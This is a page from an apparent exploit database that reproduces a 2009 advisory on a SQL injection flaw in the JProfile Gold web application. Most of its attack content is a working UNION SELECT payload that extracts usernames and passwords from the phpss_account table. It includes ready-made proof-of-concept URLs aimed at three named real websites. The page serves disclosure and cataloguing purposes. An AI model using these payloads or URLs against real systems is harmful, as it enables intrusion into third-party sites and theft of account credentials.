header-logo
Suggest Exploit
vendor:
JProfile Gold
by:
kecemplungkalen
8.8
CVSS
HIGH
SQL Injection
89
CWE
Product Name: JProfile Gold
Affected Version From: N/A
Affected Version To: N/A
Patch Exists: N/A
Related CWE: N/A
CPE: N/A
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2009

Jogjacamp JProfile Gold SQL Injection

A SQL injection vulnerability exists in Jogjacamp JProfile Gold, which allows an attacker to execute arbitrary SQL commands via the 'id_news' parameter in a 'news.detail' action to the 'index.php' script.

Mitigation:

Input validation should be used to prevent SQL injection attacks.
Source

Exploit-DB raw data:

###############################################################

     __                                                   
    |__|__ ________   ____     ___________   ______  _  __
    |  |  |  \____ \_/ __ \  _/ ___\_  __ \_/ __ \ \/ \/ /
    |  |  |  /  |_> >  ___/  \  \___|  | \/\  ___/\     / 
/\__|  |____/|   __/ \___  >  \___  >__|    \___  >\/\_/  
\______|     |__|        \/       \/            \/        



###############################################################


Jogjacamp JProfile Gold SQL Injection

by kecemplungkalen 

Vendor  : http://jogjacamp.com

bugs	: /index.php?action=news.detail&id_news=

exploit : union select concat(username,0x3a,password),2,3 from phpss_account--

POC	: http://www.titiandamai.org/index.php?action=news.detail&id_news=6%20union%20select%20concat(username,0x3a,password),2,3%20from%20phpss_account%20--

	  http://www.ligaindonesia.com/index.php?action=news.detail&id_news=1976%20%20union%20select%20concat(username,0x3a,password),2,3%20from%20phpss_account%20--

	  http://hermawan.net/index.php?action=news.detail&id_news=42%20union%20select%20concat(username,0x3a,password),2,3%20from%20phpss_account%20--

###############################################################

greetz	: Allah
	  s3t4n and Paman aka Jack-
	  my family
	  and all Mainhack BrotherHood 
	  jupe crew jangan ngegame melulu :p

# milw0rm.com [2009-03-03]

Navigation

Suggest Exploit

Services By CQR